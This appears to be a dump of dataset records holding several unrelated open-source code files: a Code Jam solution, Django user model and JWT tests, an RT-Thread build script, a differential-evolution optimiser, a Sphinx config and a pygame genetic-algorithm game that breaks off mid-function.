blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 2 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 69 | license_type stringclasses 2
values | repo_name stringlengths 5 118 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringlengths 4 63 | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 2.91k 686M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 23
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 220
values | src_encoding stringclasses 30
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 2 10.3M | extension stringclasses 257
values | content stringlengths 2 10.3M | authors listlengths 1 1 | author_id stringlengths 0 212 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
8212462617b51d5afbf32fbe0aa6e02ac157b1de | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_155/760.py | c9ed44a45ad2596edbd1cbaff02c0ff2ac596d1c | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,137 | py | def opera(case_list):
    # Convert the per-shyness-level digits to ints:
    # sat[i] = number of audience members with shyness level i.
    sat = []
    for e in case_list:
        sat.append(int(e))
    # Total audience size -- everyone should end up standing.
    t = sum(sat)
    # Shyness-0 members stand immediately, no invites needed.
    standing = sat[0]
    invites = 0
    # s_list collects the shyness levels that have at least one member.
    s_list = []
    count = 0
    for i in sat:
        if i > 0:
            s_list.append(count)
        count += 1
    # Level 0 already stood, so drop it from the levels still to process.
    # NOTE(review): assumes s_list is non-empty -- an all-zero audience
    # string would raise IndexError; presumably ruled out by the input spec.
    if s_list[0] == 0:
        s_list = s_list[1:]
    # Walk the occupied shyness levels in ascending order; whenever the
    # standing count is below a level, invite extra friends (one per
    # missing person) so that level's members also stand.
    while standing < t:
        for i in s_list:
            if standing >= i:
                standing += sat[i]
            else:
                while standing < i:
                    standing += 1
                    invites += 1
                standing += sat[i]
    return invites
# --- Driver: read the Code Jam input file and write one answer per case ---
# NOTE(review): the paths use Python-2 style escapes ('\U' is an invalid
# escape in Python 3); raw strings would be safer -- confirm target version.
input_file = open('C:\Users\chrisjwaite\Desktop\\A-large.in')
output_file = open('C:\Users\chrisjwaite\Desktop\\A-large_output.out', 'w')
lines = input_file.read().split('\n')
# The first line of the file holds the number of test cases.
n_cases = int(lines[0])
case_list = []
for case in lines[1:-1]:
    # Each case line is "<max_shyness> <audience_digits>"; keep the digits.
    data = case.split(' ')
    case_list.append(data[1])
for i in range(n_cases):
    output_file.write('Case #' + str(i+1) + ': ' + str(opera(case_list[i])) + '\n')
input_file.close()
output_file.close()
| [
"miliar1732@gmail.com"
] | miliar1732@gmail.com |
dc4154411cebb62610fc115629ae97554429cfad | 4e52ac2399187040720003a3381d30102f376b36 | /users/tests.py | 5ab660b8493b6d104fdf1727d3a22dabd8046a9b | [] | no_license | drobchak1/starnavitest | 5908758c1f7e35dc65e4af617eced68111a5ef61 | 1779655e2a24dee1242a60a8d3c42e1346f2b325 | refs/heads/main | 2023-05-30T05:47:51.992585 | 2021-06-14T09:16:52 | 2021-06-14T09:16:52 | 375,025,450 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,654 | py | from django.urls import reverse
from rest_framework import status
from rest_framework.test import APITestCase, APIClient
from .models import User
class AuthTests(APITestCase):
    """Integration tests for JWT authentication and token-protected endpoints."""

    def test_api_jwt(self):
        """
        Ensure an inactive user cannot obtain a JWT, an active user can,
        and that the post-list endpoint rejects invalid bearer tokens while
        accepting a freshly issued access token.
        """
        url = reverse('token_obtain_pair')
        u = User.objects.create_user(username='user', email='user@foo.com', password='pass')
        u.is_active = False
        u.save()
        # An inactive account must not be issued a token.
        resp = self.client.post(url, {'email':'user@foo.com', 'password':'pass'}, format='json')
        self.assertEqual(resp.status_code, status.HTTP_400_BAD_REQUEST)
        u.is_active = True
        u.save()
        # An active account authenticates and receives both token types.
        resp = self.client.post(url, {'username':'user', 'password':'pass'}, format='json')
        self.assertEqual(resp.status_code, status.HTTP_200_OK)
        self.assertTrue('access' in resp.data)
        self.assertTrue('refresh' in resp.data)
        token = resp.data['access']
        verification_url = reverse('api:post-list')
        client = APIClient()
        # A bogus bearer token must be rejected with 401.
        client.credentials(HTTP_AUTHORIZATION='Bearer ' + 'abc')
        resp = client.post(verification_url, {
            "title": "new post2",
            "description": "kjflkgjdlfkjgklfjdgjd"
        })
        self.assertEqual(resp.status_code, status.HTTP_401_UNAUTHORIZED)
        # The real access token authorises post creation.
        client.credentials(HTTP_AUTHORIZATION='Bearer ' + token)
        resp = client.post(verification_url, {
            "title": "new post2",
            "description": "kjflkgjdlfkjgklfjdgjd"
        })
self.assertEqual(resp.status_code, status.HTTP_201_CREATED) | [
"drobchak.iv@gmail.com"
] | drobchak.iv@gmail.com |
679abec5a4e844e55bb688b91516ae2c3e017cd0 | 843cd7e662071d1aeb0acb1c9024bce1cbc49415 | /LTP1-2020-2/PRATICA03/programa01.py | 76c526ba186f4b6d5165a0d96146500dad983b0b | [] | no_license | diego-mr/FATEC-MECATRONICA-0791821037-DIEGO | c1b7c78a1a58c907ec491d72826dc1a2f73f65c5 | e3b5006e6b31739bbdad75c3a617f8fdbb549dbc | refs/heads/master | 2023-01-14T05:05:21.658363 | 2020-11-24T12:22:32 | 2020-11-24T12:22:32 | 292,006,525 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 96 | py | # Isso é um comentário em python
# The print function writes text to the screen
print('ola Mundo')
| [
"noreply@github.com"
] | diego-mr.noreply@github.com |
ce721d4ba20589c27e7803b042e5ba246649e551 | 0d06d5768d3b91719078043ff8b8b01758b4618d | /bsp/rockchip/rv1108/SConscript | 0a22d7ca51baee247397c00b13ccb9a2a16b03fe | [
"Apache-2.0",
"LicenseRef-scancode-generic-cla"
] | permissive | h-hys/new_rk2108 | de71255c205cf13d8d9069e7bde84a30ddb06cbc | a899e5e4512e5fc7dbb70cdea19257291e9ff042 | refs/heads/master | 2023-02-09T09:34:35.995623 | 2021-01-06T08:07:42 | 2021-01-06T08:07:42 | 327,238,676 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,012 | # for module compiling
# SCons build script: collect build objects from this BSP directory and the
# shared RT-Thread common/application/example trees, then return them.
import os
# RTT_ROOT is exported by the top-level SConstruct.
Import('RTT_ROOT')
cwd = str(Dir('#'))
objs = []
# NOTE(review): 'list' shadows the Python builtin; harmless here, but worth renaming.
list = os.listdir(cwd)
# Hardware-abstraction-layer sources are built first, in place (duplicate=0).
objs = SConscript(os.path.join(cwd, 'HalSConscript'), variant_dir = '.', duplicate=0)
# Recurse into every immediate subdirectory that carries its own SConscript.
for d in list:
    path = os.path.join(cwd, d)
    if os.path.isfile(os.path.join(path, 'SConscript')):
        objs = objs + SConscript(os.path.join(d, 'SConscript'))
# Pull in the shared driver, application, test and example build scripts.
objs = objs + SConscript(os.path.join(RTT_ROOT, 'bsp/rockchip/common/drivers/SConscript'), variant_dir = 'common/drivers', duplicate=0)
objs = objs + SConscript(os.path.join(RTT_ROOT, 'applications/SConscript'), variant_dir = 'applications', duplicate=0)
objs = objs + SConscript(os.path.join(RTT_ROOT, 'bsp/rockchip/common/tests/SConscript'), variant_dir = 'common/tests', duplicate=0)
objs = objs + SConscript(os.path.join(RTT_ROOT, 'examples/kernel/SConscript'), variant_dir = 'examples/kernel', duplicate=0)
objs = objs + SConscript(os.path.join(RTT_ROOT, 'examples/file/SConscript'), variant_dir = 'examples/file', duplicate=0)
Return('objs')
| [
"374122506@qq.com"
] | 374122506@qq.com | |
06fd2a02b8abf201b60c6ad2a418b5f86b9a642d | 697cdbb683ee7a1aff5092f2afa9a462dd26874f | /main.py | fab78b64d8cabf3ed0cf3bdec1e8b73cb2e889a8 | [] | no_license | chenyilin0110/DE_Ackley | 68a85c99142d9f1ac5ffa76299363816d9122bd5 | 7a3de80fe663720a717c07b54b6bedd132d47ac3 | refs/heads/master | 2020-04-24T22:16:01.181077 | 2019-03-10T07:54:27 | 2019-03-10T07:54:27 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,372 | py | import numpy as np
import random as rand
import sys
from Mutation import mutation
from Crossover import crossover
from Selection import selection
from Fitness import fitness
import time
# Command-line arguments: upper bound of the search domain, population size,
# problem dimensionality, differential weight F, crossover rate CR, and the
# number of iterations to run.
Ud = sys.argv[1]
population = sys.argv[2]
dim = sys.argv[3]
F = sys.argv[4]
CR = sys.argv[5]
iteration = sys.argv[6]
# The search domain is symmetric: [Ld, Ud] = [-Ud, +Ud].
Ld = float(Ud) * (-1)
start = time.time()
# Initial
# Seed every individual uniformly at random inside [Ld, Ud).
populationDataOriginal = np.zeros((int(population), int(dim)))
for eachpopulationData_colum in range(int(population)):
    for eachpopulationData_row in range(int(dim)):
        r = rand.random()
        populationDataOriginal[eachpopulationData_colum][eachpopulationData_row] = ((float(Ud) - Ld) * r) + Ld
populationData = populationDataOriginal.copy() # copy populationDataOriginal to populationData
# Best (lowest) fitness value seen so far; minimisation problem.
best = 99999
for eachiteration in range(int(iteration)):
    # Mutation
    mutationData = mutation(populationData, float(F))
    # Crossover
    crossoverData = crossover(populationDataOriginal, mutationData, float(CR))
    # Selection
    selectionData = selection(populationDataOriginal, crossoverData, int(dim))
    # Evaluate the selected population and track the best fitness.
    count = []
    for i in range(np.size(selectionData, 0)):
        count.append(fitness(selectionData[i][:], int(dim)))
        if count[i] < best:
            best = count[i]
    print(eachiteration, best)
    # reset
    populationDataOriginal = selectionData.copy()
    populationData = selectionData.copy()
end = time.time()
print(end-start) | [
"a0989735018@gmail.com"
] | a0989735018@gmail.com |
b3c8fe1b01b4f346e6e37e7e6392529a4e721425 | 70822bf16524420a098dd44e785deadc9b8b0510 | /users/models.py | b12f7813f8d0077079a4c4b00f74d635abfb322b | [] | no_license | Will-Sargeant/Django-Boiler-Plate-Email-UserModel | 28cb1fc21197f706ff66aa23ead308568d1bd8fb | 62c91145e679bee5da37aea14648dfd731870e9b | refs/heads/master | 2021-09-24T18:16:52.049909 | 2019-12-28T01:18:26 | 2019-12-28T01:18:26 | 230,534,912 | 0 | 0 | null | 2021-09-22T18:18:30 | 2019-12-27T23:59:53 | Python | UTF-8 | Python | false | false | 926 | py | from django.db import models
from django.contrib.auth.models import AbstractBaseUser
from django.contrib.auth.models import PermissionsMixin
from django.utils.translation import gettext_lazy as _
import datetime
from .managers import CustomUserManager
class CustomUser(AbstractBaseUser, PermissionsMixin):
    """Custom user model that authenticates with an email address instead of
    a username."""

    id = models.AutoField(primary_key=True)
    email = models.EmailField(_('email address'), unique=True)
    first_name = models.CharField(max_length=35)
    last_name = models.CharField(max_length=50)
    is_staff = models.BooleanField(default=False, verbose_name='Admin')
    is_active = models.BooleanField(default=True)
    # Pass the callable itself (not its result) so the timestamp is evaluated
    # each time a row is created; calling today() here would freeze the value
    # at the moment the module was first imported.
    date_joined = models.DateTimeField(default=datetime.datetime.today)
    last_login = models.DateTimeField(default=datetime.datetime.today)

    def __str__(self):
        return self.email

    # Authenticate with the email field; no extra fields are prompted for
    # when creating a superuser.
    USERNAME_FIELD = 'email'
    REQUIRED_FIELDS = []

    objects = CustomUserManager()
| [
"will@docpostie.com"
] | will@docpostie.com |
b537ff8a73e8ae1e495b410aacca8edcf82d38a9 | 1b8951a5128a1c36fe3aece5a9c1d8dda039f67d | /sum_divisors_3.py | 8453ccde96b3e9a1b79c41ee0a06d82bc7dc689f | [] | no_license | AndrePina/Python-Course-Work | 89cf03209f0d447940685fad899064670bc9dc0c | 49e39496327be0a3a3381040ba39874855cf1c2f | refs/heads/master | 2022-12-08T22:41:24.591888 | 2020-09-12T11:30:27 | 2020-09-12T11:30:27 | 294,930,576 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 743 | py | # Fill in the empty function so that it returns the sum of all the divisors of a number, without including it.
# A divisor is a number that divides into another without a remainder.
def sum_divisors(n):
    """Return the sum of all proper divisors of n (divisors excluding n itself).

    A divisor is a number that divides n with no remainder.  For n <= 1
    there are no proper divisors, so the result is 0 -- matching the
    original loop, which never executed in those cases.
    """
    # range(1, n) is empty for n <= 1, so those cases fall out naturally.
    # (The original also shadowed the builtin `sum` with a local; avoided here.)
    return sum(d for d in range(1, n) if n % d == 0)
print(sum_divisors(0)) # No proper divisors -> 0
print(sum_divisors(3)) # Should be sum of 1 -> 1
print(sum_divisors(36)) # Should be sum of 1+2+3+4+6+9+12+18 -> 55
print(sum_divisors(102)) # Should be sum of 1+2+3+6+17+34+51 -> 114
| [
"aapina427@gmail.com"
] | aapina427@gmail.com |
8b9613542d6316a2175fc90b8151e4c82c1b1256 | f9729802d62bc72df4a6e59c3f49d4bd1fc92043 | /docs/conf.py | da4780f8311665e03ef2fa834069cce5e50e6c75 | [
"MIT"
] | permissive | wefner/emaillib | 50a63e7394d3a09dad3f58b6964335ff1ce298cb | 2a00a3c5d4745898b96e858607b43784fa566fac | refs/heads/master | 2021-06-28T17:51:56.269015 | 2017-09-18T17:27:11 | 2017-09-18T17:27:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,411 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# emaillib documentation build configuration file, created by
# sphinx-quickstart on Tue Jul 9 22:26:36 2013.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
import sphinx_rtd_theme
# If extensions (or modules to document with autodoc) are in another
# directory, add these directories to sys.path here. If the directory is
# relative to the documentation root, use os.path.abspath to make it
# absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# Get the project root dir, which is the parent dir of this
cwd = os.getcwd()
project_root = os.path.dirname(cwd)
# Run apidoc to traverse the project directory and add all modules to the docs
import sphinx.apidoc
sphinx.apidoc.main(argv=['_','-f', '-o', os.path.join(project_root, 'docs'),
os.path.join(project_root, '''emaillib''')])
# parse the index.rst and fix the title underlining so the '=' rule matches
# the "Welcome to ..." title length exactly.
with open(os.path.join(os.path.abspath(os.path.dirname(__file__)),
                       'index.rst'), 'r+') as index_rst_file:
    index_rst = index_rst_file.read()
    index_rst_file.seek(0, 0)
    # Guard against an underline appearing before any title line, which
    # previously raised NameError on an undefined length.
    title_length = None
    for line in index_rst.splitlines():
        if line.startswith('Welcome to '):
            # Remember the title width for the underline that follows it.
            title_length = len(line.strip())
        if line.startswith('======================================') and title_length:
            line = '=' * title_length
        index_rst_file.write(line + '\n')
    # Drop stale trailing bytes left behind when the rewritten text is
    # shorter than the original ('r+' does not truncate on its own).
    index_rst_file.truncate()
# Insert the project root dir as the first element in the PYTHONPATH.
# This lets us ensure that the source package is imported, and that its
# version is used.
sys.path.insert(0, project_root)
import emaillib
# -- General configuration ---------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.viewcode',
'sphinx.ext.napoleon'
]
napoleon_google_docstring = True
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'''emaillib'''
copyright = u'''2017, (Author : Costas Tyfoxylos)'''
# The version info for the project you're documenting, acts as replacement
# for |version| and |release|, also used in various other places throughout
# the built documents.
#
# The short X.Y version.
version = emaillib.__version__
# The full version, including alpha/beta/rc tags.
release = emaillib.__version__
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to
# some non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built
# documents.
#keep_warnings = False
# -- Options for HTML output -------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'sphinx_rtd_theme'
# Theme options are theme-specific and customize the look and feel of a
# theme further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as
# html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the
# top of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon
# of the docs. This file should be a Windows icon file (.ico) being
# 16x16 or 32x32 pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets)
# here, relative to this directory. They are copied after the builtin
# static files, so a file named "default.css" will overwrite the builtin
# "default.css".
#html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page
# bottom, using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names
# to template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer.
# Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer.
# Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages
# will contain a <link> tag referring to it. The value of this option
# must be the base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = '''emaillibdoc'''
# -- Options for LaTeX output ------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass
# [howto/manual]).
latex_documents = [
('index', '''emaillib.tex''',
u'''emaillib Documentation''',
u'''Costas Tyfoxylos''', 'manual'),
]
# The name of an image file (relative to this directory) to place at
# the top of the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings
# are parts, not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', '''emaillib''',
u'''emaillib Documentation''',
[u'''Costas Tyfoxylos'''], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ----------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', '''emaillib''',
u'''emaillib Documentation''',
u'''Costas Tyfoxylos''',
'''emaillib''',
'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
| [
"costas.tyf@gmail.com"
] | costas.tyf@gmail.com |
5877b18dbdd8fd46256cb5a59833e6b8f5fa5236 | b7577adc65c91dcf1877dadf07f79e76b4409b54 | /evolving_enemies.py | 8da10ac21ed5ffb878fa3f083f126493b97e2a22 | [
"MIT"
] | permissive | NeonInc/Adaptive-Gameplay | 3fdf134b308f3e084ecf18285a69f8efb9ab39cd | 783797eb0c9e567f1620fb66292ffe6c0a96524a | refs/heads/master | 2020-06-05T15:38:31.262789 | 2019-12-03T12:12:58 | 2019-12-03T12:12:58 | 192,474,989 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 42,846 | py | import random
import pygame
import math
import os
import pygameMenu
from pygameMenu.locals import *
# *****************************************************************************
# Info text for the About Menu
# *****************************************************************************
ABOUT = ['Evolving Enemies:',
'A Game where the Enemies evolve using Genetic Algorithms',
PYGAMEMENU_TEXT_NEWLINE,
'Author: Nipuna Weeratunge',
PYGAMEMENU_TEXT_NEWLINE,
'Email: nipunaw1@gmail.com']
# *****************************************************************************
# Info text for the Help Menu
# *****************************************************************************
HELP = ['Controls:',
'Use Arrow keys to move player ship left/right.',
PYGAMEMENU_TEXT_NEWLINE,
'Press SpaceBar to fire Missile.']
# *****************************************************************************
# Defining the constants and variables
# *****************************************************************************
SCREEN_WIDTH = 1024
SCREEN_HEIGHT = 768
WINDOW_START_POSITION_X = 200
WINDOW_START_POSITION_Y = 0
PLAYER_FIRE_TORPEDO = False
PLAYER_TORPEDO_FIRING_RATE = 5
GENERATE_GAME_OBJECTS = True
MUTATION_RATE_MATRIX = ['0.2']
MUTATION_RATE = 0.2
COLOR_BACKGROUND = (100, 100, 100)
COLOR_BLACK = (0, 0, 0)
COLOR_WHITE = (250, 250, 250)
COLOR_BLUE = (0, 0, 250)
COLOR_RED = (250,0,0)
MENU_BACKGROUND_COLOR = (0, 0, 0)
GAME_DIFFICULTY = ['EASY']
RUN_GAME = True
EPISODE_COUNT = 0
ENEMY_MISSILE_TIMER = 5000
# *****************************************************************************
# The start window position for the game window
# *****************************************************************************
os.environ['SDL_VIDEO_WINDOW_POS'] = "%d,%d" % (WINDOW_START_POSITION_X,WINDOW_START_POSITION_Y)
# *****************************************************************************
# Initialize Pygame and create screen and objects
# *****************************************************************************
pygame.init()
pygame.display.set_caption("Evolving Enemies")
screen = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT))
STAR_FIELD_TIMER = pygame.time.get_ticks()
episode_info_text = pygame.font.Font(pygameMenu.fonts.FONT_FRANCHISE, 30)
# *****************************************************************************
# The initial population for the Genetic Algorithm
# *****************************************************************************
# One chromosome per enemy: genes 0-5 are binary traits and element 6 holds
# the accumulated fitness.  From Enemy_Ship.__init__: gene 0 = can shoot,
# gene 1 = can move, gene 2 = bottom shield, gene 3 = top shield; genes 4-5
# presumably left/right shields (that code continues past this chunk) -- verify.
A0 = [0, 0, 0, 0, 0, 0, 0]
A1 = [0, 0, 0, 0, 0, 0, 0]
A2 = [0, 0, 0, 0, 0, 0, 0]
A3 = [0, 0, 0, 0, 0, 0, 0]
A4 = [0, 0, 0, 0, 0, 0, 0]
A5 = [0, 0, 0, 0, 0, 0, 0]
initial_population = [A0,A1,A2,A3,A4,A5]
# Number of trait genes (6); the trailing fitness slot is excluded.
chromosome_length = len(A0)-1
# *****************************************************************************
# Creates the pygame sprite groups and enemy ship lists
# *****************************************************************************
# Sprite groups used for batched drawing and collision detection.
player_list = pygame.sprite.Group()
all_sprites_list = pygame.sprite.Group()
player_projectile_list = pygame.sprite.Group()
enemy_projectile_list = pygame.sprite.Group()
enemy_list = pygame.sprite.Group()
enemy_shield_list = pygame.sprite.Group()
star_field_list = pygame.sprite.Group()
# Plain lists tracking the GA chromosome population and live enemy objects.
current_enemy_population = []
enemy_ship_list = []
# *****************************************************************************
# Creates Genetic Algorithm class
# *****************************************************************************
class Genetic_Algorithm():
    """Simple genetic algorithm over fixed-length binary chromosomes.

    Each chromosome is a 7-element list: genes 0-5 are binary traits and
    element 6 holds the chromosome's fitness score (lower = fitter here,
    since selection prefers fitness below 20).
    """
    # Initialize the class
    def __init__(self, initial_population,MUTATION_RATE,chromosome_length):
        self.initial_population = initial_population
        self.MUTATION_RATE = MUTATION_RATE
        self.chromosome_length = chromosome_length
        print ('Initial population: ' + str(self.initial_population))
    # Determine fitness of chromosome by looking at element 6
    def current_fitness(self,elem):
        """Sort key: a chromosome's fitness is stored in element 6."""
        return elem[6]
    # Sort the chromosomes in the population by descending order of the fitness value
    def sort_by_fitness(self,current_population):
        """Sort the population in place (descending fitness) and return it."""
        current_population.sort(reverse = True,key = self.current_fitness)
        return current_population
    # Select parents from the sorted population
    def selection(self,current_population):
        """Pick two parent chromosomes from a fitness-sorted population.

        Returns (parent1, parent2, early_stop); early_stop is True when no
        low-fitness (< 20) candidates were available.
        """
        fitness_list = []
        for chromosome_index in range(6):
            chromosome = current_population[chromosome_index]
            # Select parents with fitness less than 20
            # This allows chromosomes with lower fitness to be selected as well
            if chromosome[6] < 20:
                fitness_list.append(chromosome)
        # NOTE(review): '> 2' requires at least THREE qualifying chromosomes
        # before the first branch is taken; '>= 2' may have been intended.
        if len(fitness_list) > 2:
            p1 = fitness_list[0]
            p2 = fitness_list[1]
            early_stop = False
        # If all chromosomes have fitness more than 20,
        # select the two parents with the highest fitness value.
        # early_stop value can be used to stop the algorithm
        else:
            p1 = current_population[0]
            p2 = current_population[1]
            early_stop = True
        return p1,p2,early_stop
    # Determine the crossover sites for the parents and creates offspring
    def crossover(self,p1,p2):
        """Single-point crossover of the 6 trait genes; each child keeps its
        leading parent's fitness value appended as element 6."""
        crossover_site = random.randint(1,5)
        # Slices cover genes 0..chromosome_length-1 (the 6 trait genes only).
        ch1 = p1[0:crossover_site]+p2[crossover_site:self.chromosome_length]
        ch1.append(p1[6])
        ch2 = p2[0:crossover_site]+p1[crossover_site:self.chromosome_length]
        ch2.append(p2[6])
        return ch1,ch2
    # Randomly change the values of genes depending on the mutation rate
    def mutation(self,chromosome,mutatation_rate):
        """Flip floor(rate * chromosome_length) distinct trait genes in place."""
        mutated_gene_list = []
        no_of_mutating_genes = math.floor(mutatation_rate*self.chromosome_length)
        # Loop until the required number of DISTINCT genes have been flipped;
        # repeated random picks of an already-mutated gene are retried.
        while True:
            if no_of_mutating_genes == 0:
                break
            # Randomly select a gene from genes 0 to 5 to mutate
            random_gene_to_mutate = random.randint(0, 5)
            # Check to see if this gene has already been mutated
            if mutated_gene_list.count(random_gene_to_mutate) == 0:
                # Mutate gene
                if chromosome[random_gene_to_mutate] == 0:
                    chromosome[random_gene_to_mutate] = 1
                else:
                    chromosome[random_gene_to_mutate] = 0
                # Decrease genes to mutate counter
                no_of_mutating_genes = no_of_mutating_genes-1
                # Add the gene to the mutated gene list
                mutated_gene_list.append(random_gene_to_mutate)
        return chromosome
    # Generate a new population with current parameters
    def generate_new_population(self):
        """Run one GA step: sort, select parents, cross over, mutate, and
        replace the two lowest-ranked slots (indices 4 and 5) with the new
        children.  Mutates self.initial_population in place and returns it
        re-sorted by fitness."""
        current_population = self.initial_population
        sorted_current_population = self.sort_by_fitness(current_population)
        selected_parent_1,selected_parent_2,early_stop = self.selection(sorted_current_population)
        generated_child_1,generated_child_2 = self.crossover(selected_parent_1,selected_parent_2)
        mutated_child_1 = self.mutation(generated_child_1,self.MUTATION_RATE)
        mutated_child_2 = self.mutation(generated_child_2,self.MUTATION_RATE)
        current_population[4] = mutated_child_1
        current_population[5] = mutated_child_2
        sorted_generated_population = self.sort_by_fitness(current_population)
        return sorted_generated_population
# *****************************************************************************
# Creates Player class
# *****************************************************************************
class Player(pygame.sprite.Sprite):
    """The player's ship: an animated sprite driven by the arrow keys.

    Frame layout inside self.images:
      0-4   idle / flying straight
      5-9   banking left
      10-14 banking right
    """

    def __init__(self, x, y):
        super().__init__()
        # Load the idle, left-bank and right-bank animation frames in order.
        frame_paths = (
            ['Sprites/Player_Ship/Player_Ship_Idle_%d.png' % i for i in range(1, 6)]
            + ['Sprites/Player_Ship/Player_Ship_Moving_Left_%d.png' % i for i in range(1, 6)]
            + ['Sprites/Player_Ship/Player_Ship_Moving_Right_%d.png' % i for i in range(1, 6)]
        )
        self.images = [pygame.image.load(path) for path in frame_paths]
        self.index = 0
        self.image = self.images[self.index]
        # Position/collision rectangle sized to the first frame.
        frame_w = self.image.get_rect()[2]
        frame_h = self.image.get_rect()[3]
        self.rect = pygame.Rect(x, y, frame_w, frame_h)

    def update(self, surface):
        """Advance one animation frame and apply horizontal movement.

        ``surface`` is accepted for group-update compatibility; not used here.
        """
        pressed = pygame.key.get_pressed()
        if pressed[pygame.K_LEFT]:
            # Cycle through the banking-left frames (5..9).
            self.index += 1
            if not 5 <= self.index <= 9:
                self.index = 5
            # Slide left, clamped at the screen edge.
            self.rect.x = max(self.rect.x - 2, 0)
        elif pressed[pygame.K_RIGHT]:
            # Cycle through the banking-right frames (10..14).
            self.index += 1
            if not 10 <= self.index < len(self.images):
                self.index = 10
            # Slide right, clamped at the screen edge.
